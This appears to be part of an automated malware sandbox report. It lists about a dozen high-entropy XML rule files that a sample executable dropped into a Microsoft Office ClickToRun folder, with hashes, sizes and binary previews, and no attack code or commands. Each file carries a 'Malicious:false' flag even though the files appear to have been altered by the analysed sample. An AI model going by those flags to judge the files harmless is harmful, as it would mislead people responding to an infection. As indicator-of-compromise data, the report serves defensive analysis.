                                                                                                                                      Preview:<?xml.....0.....gS.|+.q...-.....C.....k...o..D....0hY...!.._..EF.r.M........I.1;.=f...L..G`.w..1.......L...3 P.E.]8.;..\.`5....eu..O'xJ..^7.....AJA....2w...BQ.0..|.....@...J.<-X..iY....5....E2.&(./PO..x............9.?P.p......d5..MH/...A.z...%.F...&/f...N.Xz.L'...O..#..\.....*^t...$..4.....9.9.Y(6.t.g.k>.3.~6.tB....O9.JY?..a ..!G...J.f.S...WGh.Af...}.l......n..a.D..*m0..g...uA.....~/.:&...f,r.J7>..N...R........[j`......Vh..W........x...'..1...I...7..l...%po..{....O.O...g.a.`g.8.......7..)...^!.]....;.K.c.}..v..H$+......F.j<.......3..N......y).u#e+........}M.X.W.v}]...^S.F....{:..Z!..\.<.qFD...n|..8w./`=......?..B....M..ak..'.2>..\....3.o.......<..+..:Y3c......*.C.Z....k3..K.m....*f#.R.........Y..pxw...._..<I..8.x|..O0^tt..g.g...3..Z.#...@.....g..2<.r.."X.....*.5.6.g......cxD.._B..n.z)K.b.}%..<p. *~.B(....v......rp;..1d.:.3.h.z.]....:....+.K...]>.5.Z`..P].n.;4|i.G4J.G...........!..\..GS.g'....tu.e..9Kx6.../v.?..*.;..!..B,....."J.....3\._.@..#ZB.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10450v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1387
                                                                                                                                      Entropy (8bit):7.849831540711288
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:XQJ53HKCtiZGYXcyGffntveLrgkysEeumXOSa7wiI3sQjE1iOjxivD/bD:XQnVirXcyeVGLrgn0A7wiI31rOjxivPD
                                                                                                                                      MD5:9C6A14D00EEEFBC97DE5F1A2DFD9F7B4
                                                                                                                                      SHA1:9F165DBFDD051CA701B96DD5844016768EBAF877
                                                                                                                                      SHA-256:C7141A52D60D2567F7B0B6A98605AA7722156011B583162358154FAAC8919694
                                                                                                                                      SHA-512:4E6F3B1C7225C8C6D9DBACCD2894F5AB8D8879B18AADC7DEB74008F21DE42A39E5AF86FBE7FC6BCBED9EDB9FBE34AE7F305002199D7EF1A03A3D5D1902DF5922
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..e..g)e.b...3r..s.V.O..Z>M..o&.Z}G.X....._&...l...........f. .U....}__...a6..S..5_.c..L/[.p.I.w.Y./.N..... [$r......&........9I.....o..m.G..H..&d...l..+...VY..._\y.;. ..._y.L.;|V.W..E9...G;.l.5..d........e.R.!.k.l:..O!k.`m...3^.o..A4.Z.Y3.....{....X4".*A..3..H.%8..\..#l{...8.@.....*cy..F...3..i.&.V#.U..<...X.[d.@l...n..CR.&..;t.4..Zp<..J..5.g...c.xP...Q......~.W.......A.J.Z.r./.^.$..V>5O..Q._.x<.4....ed..nIB...n..+......8.A......."dQC"..|...h..G.|f.1.0......S+.V..Sc.;&1df..=...:W....Ao.|x.m7...@......).m.Yg..B.W(..(...?.&&.0.9/.B.....ViLV..4}B..^.?o.0..~P..}....Ny.....g...:i..R..W[.B9.YL...x.\...Y..m.s....K..My_>..._.p{8...g. _].tz'..7.....g..~f...h=.-.?.z...:T.D.P.%..._....+q...N...&,/`.D..W.d\N&4].g..x....=........4l..A.T...........n..au u..w..H...E.J.2..*.S..:..X...1..j......P A.....2X8{....T..Q....MQ....D.P>b.&......1.G..C..a...:U.d..~...v....(hn.f..UH.......k5.|?+.`..>pF..y./.....@z.........?..Y.BW.b9$.>......D..Lv..}.....2s

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10625v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3024
                                                                                                                                      Entropy (8bit):7.934676704011826
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:6t+MNB1bwZzpvT6uXaCHSW4YcqFRjNBVDMOb/z0bqJGPWsO9Q2nNJEAA71afEh+A:6t+MX12N6uqCyW4sFFVDMO/4/esOFNJM
                                                                                                                                      MD5:2B7164FC02924DE5C4B67C8BD3FB07B0
                                                                                                                                      SHA1:0D60326ECE1ED7ECBB6907931D0F48D065CD5111
                                                                                                                                      SHA-256:9217AC1A570D225F13DE90CFC1053201961305715FC1C7B332073A177A9517B7
                                                                                                                                      SHA-512:C141374BB4B1DDC223296BAB692ED149CD6C8711450382A559749595A9DB31BDE0FA253CECA05D0A09BE822B4EEF0963F90FBD4C245824454ADF1176BCE13B3A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml9.......;TV.."J-.<.....D....T.}...F..X...9.e.M.......b.P..&nD....c.....V..)!.,.w{.a.......<.......|......K.VK.......z.u..0.I.h.....(QJ.p....zK;J.J;L....+sq.t.....p|e..c.i..;O..@..5....B2$.....f...u.%%....}.2..Gz....o.;.\.....y......bku[j.o.g.....s.(.{..2..mb.|.dB9.. ......\(PBO?;1.=-.oQV...l........W..............G..=...{..W....>.4.%.%.BK..C.U]upyH...%..U...$.......U.c..[|.G0.-xR6`'T.``d......Cg._P.t(z_....=.u.Ri.|>.....+....l%#.Bf..m..r.......z..y{.t.].+.,'.o..17...2..ph_..S...G....j..O.3...F......0....d|W:h=h...c.q..PN);}U9..R2.%p).X...~..b./~m.'L.^..^?*L.W%..Ez.x4G.]...$VV..}}.6y}.....)o.[..D.T....s. @.s..w:.]...&..l.Ml&.>$L.....Mp..Xm.U...._bT........U,..S'T'....vh...D.)..uQ~.....@..."...f.xq[.;... ...Wx.F.TD.I1w&@.]...@...].;...L{.|F.....yo....$.g.2.z..._ .fg.9t...Y.[.F..a..41...{I....y.9..........S......6.;......h.1.*....EQ...0r...W.=...#....9.t...+..H...~0.|EWxX.w.,..lm..v^.Q.a..m`..$..*..G.W.....c........,P.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10626v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1675
                                                                                                                                      Entropy (8bit):7.8832313691802085
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:hWuK+Iy23EwIKxqMnukdTPcyc9euXY7XahPCh5kzepD:hWAIPpB5Vcy+tcXahPChW2
                                                                                                                                      MD5:94C8F49EC06F40AF826EBF78C2C56227
                                                                                                                                      SHA1:2891BA702288A3EB9612660E91350A8BFD8C7614
                                                                                                                                      SHA-256:4CFA103A94B9D26BEDF095AFA6F5EE86AB4FEDC25C11386D462B002F97DE6B48
                                                                                                                                      SHA-512:439893B987BEE467EF8C57E16F967071598F042819EBC2E6E9C56AE5E6A46A554994658246AEF71B085F9026F20FC29983141B8AA2A160FB79D9913CDCC8ACE1
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml.J-Y.cb.u..MZ)>N......[.(J........L..e.G.zi7..%R..eaW...o.(../..KU..g>..-.t..y....O.t.....:..(..d...dlH.....%\q.}...T...CO.J..(.T.w.G]....V..P.&1t.B.........m.q...`..Rg@.t@.uC...X>...N..N..T..j./.....K..c.../..;3..Z...u..vD..t...."UnAr."...8...u.IN..(.'...+zs..~(Oa.......oy.s..%I...C.....~.")....t..@h; ..5.bo.9....BTv+.9.H.<.C.1..#...F}f.DV.[.!........x......W..Q....Gm0.....H...m....KAo...A....~.z.Yph.....d..^<.#..x......"5.uj3...6..OM..3...R..e.).......{...DK..(8.y....N..L.TE...V....F...Z.....p~.x.e8..T.~...D.?...a.v..f.....o........).......8]".u.]..w..?r]..`..............W"..u.4.*..(..<AyaOD...0.~cj.P...e.ZS]u..V8.d...)x...Tg.....Zr..B..'...... jd...6z....\MP:.:|3...7m(...X?....JT.m..!.^6Y......QDO.s7.. ....;....t..B.Q....J..f...U.....y.DU.\c./....n.h{.=.K.C.E.}...pHO}....&..|.._..'..>.eE.}..|Ys}M[.n..&Lc....A.,........~.-....*...Y.~...]..(>}.o=M...\.#...z.P-.W...0i .hL..^M..m.(.......M!.F....Syf..s....j7V....hvBe......aW.qR^.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10627v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2113
                                                                                                                                      Entropy (8bit):7.888312656526535
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:IUVGvosHEf/Jv0q5t0tW0sTg3j7tehPk4rHULMkJXVRLJEEjtPkeKlD:IUQvoaEXaq5mtW0qg3j7tNX7JEEhPkew
                                                                                                                                      MD5:7BD2E7AC14F082C30BE6ABDF89EA38CF
                                                                                                                                      SHA1:2454B08A5990A85352641D9B78FB1CD342CE4499
                                                                                                                                      SHA-256:AD3FD8C5D8898F8D209D475442612E76DFDBF4E7F8658FF8BC2C69580E44F586
                                                                                                                                      SHA-512:976F9CA48A78EB114FD910E5C17374D82535C6ABFD8B2A99757FE4EF3C0B91CDC2C15874E264BF43D258C6DDF5BB35F2D218EEE833925A67E8D6DBF1DFA61C71
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml..XB.7..|. [...us..............7.-.!.Q~>JNRO.3".4.......&Z4O@)......z.6^..,......>...toU.4J.~.:3..N$.h..{....rX1.n...M..l...!...R....p..};...e..7..B...-.a...9y..O..E.P.O..,.=.>-M.&A.4...Gxg+..[.....8.s..*...?.....).Ott..[H......%:.H.7Q$..[.8....F...h.g...}.~.....t%...IMt...6..i.|u.C......o.<r..(....U`..U*.6 .....ES...].5...[.j..G7.f3.!..L..'.a,.!.76.d{.....#.P..a\.ji&.j =.6..p#...../g....H.........vM....m......7...C..~..Z.D....<SW..&..`..Y(..w..^.u...j.w{.W.Z.bt...Nk...(..p+.`*....o.......FO\.Z.~.0[.SAX..U>]...W.K.z.@U..)n....$X..R.4...L1..9....d.~5:.j........C....d.{y....rFV#]..$......9..{.3J,.!\.$S:.l..CJ......S..S/XV.......2.f8...q`..8.......P..."t\RRM........)2.....?0.q.Hz.Q.e4.J.......a..+..w(.@........L........O.3.r.B..a.h...:....a..KaU...6.}C.V..\.NB.j.(R.=..)..;..q..L.j....7b...]X.B#.g.k@...,....k.`.3x."._.r+u.A.E.H.,.6.[..K....0.L<......<.I..>.(..kitg. ../C....j....>..M...v.../ohP.f....q...e\...D.=..\.=T...bt....:

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10781v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):813
                                                                                                                                      Entropy (8bit):7.7667281834042425
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:VXdoz0aDcSTs/9XJ7CrHAoc4kmikpaOwkXcK8MbD:VXdLSTslXokcLAhyc2D
                                                                                                                                      MD5:8331C150CB9D7FA517A4CEFDD3F4C839
                                                                                                                                      SHA1:803B7C14D0E7DC5ED0B879DF8CF681D8364F94D9
                                                                                                                                      SHA-256:5F87D28370ADA93F46DAB7ED4DD19A7FE6770A6DC4C14865B478B504FE25BE6F
                                                                                                                                      SHA-512:2CB27F48E2BF869208E311D78990148BFBCC1245D0C299E62657A0BF0729016B73E2E64C7B84864E1B253214277B97B7F397CF2820F2CE7FFB7D6261EF81FC17
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml...8.2z....F..l...U..i..N..$.\v.\....4S.{n...}vG.:...#.......d`.&M+.....?<........>...[G....<...5.9@...jk...9.<.U,...m....M.K....3j,$..ujX....Cp.?.fR..9B_..c.3q..K3._(.a........p..-...5.M........&........16."..0.HJ..79...[.V..}._.%-g..Zb0.M...\o...0A=Em...\.^..:...J.Z[x.@...'...9^.K...W/...l.0..7.B:...%......a.K1.........LjCf.....<.... ...5.q.........#..Q.....b0..N@..nk...gb.......\.....w.......!X...6.......r...=a.vX.c....d.C*....._.g.jC.K.Y.......Z|....#P.(./wRuc...3@.uQ.R.qQ.0..}.Vr.e6.+o........s4.it......t...r.v..{..5...BE_....D.*r.._t..........2....m..~....sPg..YM.Y.o.....|...:.v.?I...@.7'...>.])..@m....l....".....F......w.....9gH...^VJg......n.H%..7O.....fa."...W..E...=tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10784v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2070
                                                                                                                                      Entropy (8bit):7.907227053440034
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:ADYwy8H8WtnBe7xorNmF4IAeP71unzRAA6cMkd5l1A3aniWD:EHZtnB2AmFAq1un1h6mn+ap
                                                                                                                                      MD5:504147A1B4BDA7A51E4B1DE22006FAC9
                                                                                                                                      SHA1:DCAB03016ADAEB2EB102F9CC414050B21785DE26
                                                                                                                                      SHA-256:80159485762867F11DA7BD7E055C6A810CD68D443E7F880834B2586181936FEC
                                                                                                                                      SHA-512:118100A2D48433C8F5B25775AF945727092C44FE51E2AEB99604DC82F31DC9E7D8168903237A086A1697FD4B0E5C730A2E14A9FA10A945FD3E96E9DBA837D90A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml}@U....3.5|.:......v..$Z.r.....4....H...D....*)w........Q.. v7.7..`.T..Uy&& *....g.\#....~7.:.+..W............o...i......#.B..h..`..PZ.4.....e.......Om.%...gN.:.<..ny..>....r.}."...n..NooB.p.w.......z.#....t..V\..l....[MUzi.L..F.AF..{W..j.;tV_...7....>=....j..p..FI...XH..F_.......sh.YL..COA.'...t.....J..3...t2v.7QH.......i19.....f..#...._TV.3...V.S..q.q0.:.T..^.\.(h..?(.i.....a7x.........m.......fh....KZ.4.~F=..G......pV...........pY..F..".+....!L...[B........_......\I..>..Q.@Ht.g... +.....`....:|?...)....<.}\...L.j."..FyUB.I.J..i.>n.a.6..4[N.].....vU..+c.....mH..dF.ys..s{n........ ..}.acCJ.8@..l.....j._#|yZ.c..{..`....q......9.0L.._.......3....{...e...H`.(.n.x..bi..5..z......."......U`.~..>J.jl+.L.0yr..4I...'^`.`.!SM\6...)/E'@.../H.k.."..:Vso'J.V.Fg.&V....Q.........7.b.C..*..<u.^c....5K$...o.R.X.jL....b....]A!w.*.z.E......(.}.>e.g.y.J...kr'.[...N.;.'..pI..63.(.+.a...F....^....g...G...^;......!._.[..b....=..A..D....c.b....A...j.U.4.7.

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10800v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):789
                                                                                                                                      Entropy (8bit):7.732051957675093
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:Dab3PWd3QxfqVbgnF0hI8sx9OUP6t7GRSbD:YeFQVqx2Pdx9OUSt7GRAD
                                                                                                                                      MD5:9555643470E6675EDAA25D160E724F56
                                                                                                                                      SHA1:F8A3531121F39B273796976ADB8D747B1E37996B
                                                                                                                                      SHA-256:DFB8E772874CC2D80CDC867B69476AAAC1E0772382A0BA88E9C2B593916B6724
                                                                                                                                      SHA-512:FA06F50D3BDE17078C7ACE1713E0DD45B7379C429CC8169CF85ABC7DBCF1820BA0D44DE7FA9808EB3CA6EE8959E0D43D3352C2D3089A64B2CD9C86AE35F6879F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmld.....y..0..$...<..8Z...o.a.....=h#d{S...T....1....5].:..@-+..%@.....5."-x.8JB..s..4.r.d..qG|@i....=.I.uuH..,....>.0.C..T..3....I.E....ve...x..z.I[+.%/...a..Tv..R.4.l...d.y...c.b.+.L......fL.._.:|.@..{....+....Y.....t./..2..a.^.Q%..^.0...]...;...U.u..l.-..K.*..y#.y.....6?%*5Z.....y.....U..Ni..r..........w).R}g.jng..hb,.....V.KiT+.,..w...r]u...@.d..4..S........#D..............#jR...b.7.O.3..R_d.......].:.,..=.|.....w.W.(. ..V.9_....8..%f.9..S.y...}.l...s.Rm1...TO....[.P.f.(.Q%~..i.S._~.....;..B....V/.`.<...4>...PG4sgv.c..9['\...i.|......g..W.......Y....G....1f.|..wSy...p.^.....'E.[.6."...=..qZ.....+.7}r.D..c.E...H..#.5. ..E..=.e*..'.....r...J.I.. .e@..Py.%.U.n.7._tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10801v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3017
                                                                                                                                      Entropy (8bit):7.939525111736202
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:5w4kzdNk9Q8AgKUlf2+i8cBGsrH/a3rzgp01EuHdZwPuDt2WxH/D:9KuAgKUlzNsTi2uXGegMHr
                                                                                                                                      MD5:8A92892F230A8655926DEB3C9FE9B2B8
                                                                                                                                      SHA1:3099A6FD220876F359207769B8DD2C756303AF7C
                                                                                                                                      SHA-256:4ED22FE61BF5CB6C8E3723B97E21209819C197581DA982683652C14E8D917737
                                                                                                                                      SHA-512:91132B9CFE369E436A9C2E38F7B9DDD928746072B436CE7B03D9A918B6391C2758EB9D8FE033D475496D961CF185D5FA35221D4DF3E73C7CD62DEF924B726C7F
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml....Kt.3...UCp?..6b...C_...A..t..-`{.?...F.~.....L.].Wm.g..m.Q).Q.$..Sq....5..~LG...........H..w..........(...".s_.o'e..........?.%,(.3..1/i...-.I.../..HE.0{.w.\'.y..u>hM...Q.|.....)G.._]Z5....[W.n"...)"7.e.i...O.}.j....y7BJ-.0OYu>........A...7..a...qK.g..|.{,..#..ba ....j..)d..m].CB.6..../..$..k.6c.}...8N..:..Xi.2p.....F...a...bk.a...^K..:..\D.F.........t..m9...H.0-M.....v.s.~?......j......"n.......f.. !L."jW.?m[~..70y......W ...Vo............\.p"..v..g.~.O......u.....r.z@.....|6j....|..S.6"...]..8..r.%....,..r.g.agw.\....Nh.C..)/..m.......<...#.>..,.c.v.<C..N.z..K......Xua.N..,.....~b.....Z...:<...........*.<.....3}...A.6.8f...L.\A...b.x...s...XQ..rO.h\L.H..hA.!.+....h.4.{y.E.H....Vs...c.i........=...V..:&...{.......}l..+.z.......I.6.^.22.L.a6.L...d....y..7.N.#.ta.........+|.....S.M.V.5.u.......7..9].;...w.8a.O...K...~.}5......*"d.0Q...(.h..... ....T...K....\.B...h.1N]~.f...sq....~U..5.r..............v.....B..]..K.d...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10802v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3017
                                                                                                                                      Entropy (8bit):7.929123352890005
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:3LTaxOI0DFkONMMUKgmXqQAHYComdChBYcjJLBnp8yB/8AbT2SomgxAfFXlWL55D:XFfxkOnUKgmbA4adMBYcNlOyB/R4ANXi
                                                                                                                                      MD5:9A784D14E65AA97140E0019B337A81AD
                                                                                                                                      SHA1:B8B0493CA5E10CEEBD2F4CAC449CFC3CB37D3E52
                                                                                                                                      SHA-256:B156A9AF06D30F82A004EA2F11FDB94A930681DBBB4E486DBDE9E9936399A4B6
                                                                                                                                      SHA-512:9C63EEAD680AB7D629868118BC8F4D11406F830F56A450C99C3766C88D75AB23A718DB10903D51B9D5B8611C4A39590E73429297C5C7187B76BD9240833F5047
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xml......b}X.x..qv...........*Q.C.f...I_....f._.@.<.XG......3.F..:.j.....y..F"y..M..Y+q..Z.%.q....6%.s.29.<..J.....@..HbJ.c.'t.$..h....<...Q......=...H..f..(.#..K$....J..>.o.......I.....z ..2vs...fx..G.d..FC.m....2..F`.GH.<.W.\o...W..K...#.8...X.T....%'..v......9........|W..[N...+...}_b..G.Y.|~...J!]W.(.....N;Q..1'.+..e`2.a.8j.r.'..t....CX%...H......5d...!...........zK..%.M..3>.Q.....<..A~.......^..t.......i.$g0yo.....o/....,..4..dj....v../.|.c.>V.;...S.9.Q..S..u....5z.....VW.KYM...4p..B..E..BG&[...e..k.....5P..o..../P.....&6j.h......m..d.8}Z.y...4.^D.?A..t.9........b[.R505?....1..B......';^m..7..=.........gb..Wb.I..D../*.&n.Jd.2..\|..4.6^X.6..w.:.......,.D....*ud.v.k.d.....<~~..g...E..=...}(..s1....:z;M}.q.-...:''.|=........r4q...2^.-{+..:..F)...I......../.....'...k...r...6...kB...KMK...&......Q..Z.^...1....VwV....h.......H..$...c....<.Zd.G.EP...dn.Fh....u.*.2A.Q......sE.{Q$......E....".^...j....dc...;.l.g.ut..[....*..d....

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10803v1.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4639
                                                                                                                                      Entropy (8bit):7.959391496444663
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:RLVWT1RubK2M4TGQQOZri4+dfXR1F+5VefKZTDfxO2oKoxO9:tVWepToqri4qXR105VKKLO2DL
                                                                                                                                      MD5:2D2C80F35DECBE1E31E67C000ED195FD
                                                                                                                                      SHA1:677B85C22611BFDFF17B5CA6921D78A292A20113
                                                                                                                                      SHA-256:3B65017620CA53908FCCEBD58D05197591A885BBDB65912B1B6E8F4124089742
                                                                                                                                      SHA-512:92C794ED6F8E738D1A0C5B952644314007174A86AAB88CDD2871B2EEC24BD17D02BEA76EFB3F84ACA3DAA6BE0A0700E03B237292179054A7F407F6117E112A97
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlve..D...-f..<@.......1...x2.s..h&..4.T......,.d..P...9+..e.\...5...o.s3.0.......d.....A.~V.l.ygH...V.1.W+.rx.g...7.....#.9b.a.Le.^HK.\.x.9.$.}._...(.oN.p1&..."..~.Ma.(y...n0;..g..`.....Kp..uo.}..c...6.......:.:......ac....}c....X....4.z.#o..I.i.$....kjiC...[.....y....D.C.^X...j..c..q0.t{..e.[T...cB.l.].b....\e..w.Zl.5H..F.0.V....g.E?...7.......p.....{O7r.n({sp..#i.....Q.O.3......t.F$......jK...S.u.. &h..S..I...Y.H.W.....h.a..)A.*...Pp...R...wC....e3.._....f..LSt....Q-...#]_G.g.A....L....G:..R..D.._I.....S..a....T..^x.V.pe....Jj...v.........{-.d.i*.....2.H.....(..n...RH....F7.......?.!.....e.....&.;U.U..2A.2.z...Y..K%WJ[.O*.D6 G4#E@.$.OZ(.A..i 1....U.kY..VW.x9..........u.V.....#...?F.-.{q.l{.E..g.$Y..m.<@w./..g.l.m:3..;.Lj....-.b..{....7..3sQ.G..e.:&.......#C.Jr.Q..@.().{7........?.o...]{......"E......D.;9.f..I#......d......dZ..(.w2......?....../...zm.3).......,.9...>...v`.F.O.....v..>.....}ST.2.Z(.o>..G).}.o.,@...W...;.U.y_/.u.[..

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10807v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1329
                                                                                                                                      Entropy (8bit):7.864771691075574
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:+a6xUm4O8Y7+JOin+p8PKXJXSj48DQ0C7QZky54G6Ka1bD:+z4k+si+Gm8sh7hy58lD
                                                                                                                                      MD5:2DD37497987E670A0A2449A0DE06F7A4
                                                                                                                                      SHA1:4E0587DE1338E59CEE68392D53303F7018C35B08
                                                                                                                                      SHA-256:C9D22545A32D201D819F8F9E926C6A70A87E0C1BCB1D90A06FCE93E0E73B6340
                                                                                                                                      SHA-512:D3E5D317505C711F89F022955D3D549C9043B6339692BA0BDB3486399AD6B60838B0ED32ACB9312E7C3E0DE97E0F903391369C6B220C1D2C0A2E1021444E5A38
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlZ...........C.E......V.b.*...M8.;2.M...;.@..q.+#...}Yr.....B...K.O....J.l.....g^....F}......U.M..P:10... ...9..k...6..t.T.2.[..7..........]{..5nv.....h..............PF.8...o.m(T.o.d..m...I.`h.^.M.6..+lm.zy...........1.....l......3.........!..E..~.}sCR...a...........A.#1J.}.....@..+@wK.r(...B9.Q.,.Bu..=.v7..:.e......3VZ.......&...r....,...@...s..[../..tf..U.......7.....HS.P...R.s....o.$..W...9.W.#.%..,H.......-.....m..8,7k.)...%..%d._en.&.......J.....:.e..X[.Z..W|}.#q...n....w.|..7D!Q...........o.t.....3..fT......%..G."#.......?>8..K.h....T.......8zc.A.x.'..".?.../......F*x.D..]....X..6.t.V.Q.;...w..&......Q...M.Y...............r.`.......]Fu....d..ON.t@..u1.....d.U.t.%^..=.\..r...i.0...v.^...3./R..f.U.;..w.B..^..T2.U.:.HW.n.3z.z.........y.6....K...".v..=..........0...HSNN{.=?..0.e}..Z..5..|.6./.J..y..T.V..?...!.k....<V.[.....o.WM..'..,...`<b.op+.K....S...]f...q.D}.J.F..O.0E3?7......g...($dx...jVB@...-.......1J.|.q.^..CwY...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10808v0.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1395
                                                                                                                                      Entropy (8bit):7.823150733938381
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:O4ZqK8dLCuHoIO0+xJYyTTMmSdMQK3V7bEd6DJZO47sIGiNESVf8+wUbD:MuuHE3vM5HK3VfimZFEYEMf8+7D
                                                                                                                                      MD5:C882E033F87E578474998E524F4B8E32
                                                                                                                                      SHA1:E9246A7489D877C35E99F7D0F9BAFCDF5AAE47C1
                                                                                                                                      SHA-256:D400677CF35D8AF46C919DB12E035A37E0B15D09FBAC33C4B8082FFB093E925A
                                                                                                                                      SHA-512:AFDDEC52FA44E7AB20F26548822FCBF1EBFA98BFF0AF6F62132958853B7D29CED136BFBEF958BD8785443ABBD697E862369FD95858CC414E66B9F7E58FDFDDDD
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<?xmlvb.../kH.d..Qg..Dw.x{>:.%4I.k.-.fAu...N.<k..+35........<..8.K..@D.9.#.o.}..%yr%..Y...m......d.&l.;C.e.m...C...7....yCr......[...-9rA.j..t.{r$.]p.._xIh.......q.@..PXY..o.4...e.....JV..D..r.YR..U.x.......>.Y....)..._+........>..!..$/I.....kn.J.c.....H$....V..k=..v..../.'......]..qp@.f7_.'.\.....&)I..8...n~h0..i[.?..\../...<13..Q.i.j...Y..&p..X...p6...QB.=......2.Zo....L..z.R..A........@..U^.S.|R...R}[7&.a.6.......nWH........LA.....?.7...E6`.x .x....s-..WN8..h.bP.s.[E..y.buIEf..U.WA.+....p....=.......B...<.}....B[..cwB.(hG.{-{..,|.......z.. .x.n-.|.wS...H-Yg.Jz.2Y..v.-S.3.^..j.H..E....A0...V9.j..~....F.n....4l..d...~t.2.D|/[Y!..A..bE,..3+....;..D.Vy^!........Q&.In..3D.Z!..`sv..%R...qQ2..qikm..O..8q8.X......;.@.Pr,.._...-7..r.n...r..x...gI$...i...R.zEQJ.k.WW..t.s%A..c..e.........Y.B.....K...).eh@e...q[.roB. ...<._....'...{..y...%.%.B.2.......7..k...e....*.O.O.o..dj..+l...9L.xi...U..:....xBA7.L8......2F+...4....XAg.b.......3.....H...

                                                                                                                                      C:\Users\jones\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10818v3.xml

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\Desktop\qJKiVKZdFk.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1124
                                                                                                                                      Entropy (8bit):7.813390558585644
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:ejW6uPCytkiDoDlHPbSpXnKaRPfjrTTTFbD:eurtkiDEJDlaRzrbVD
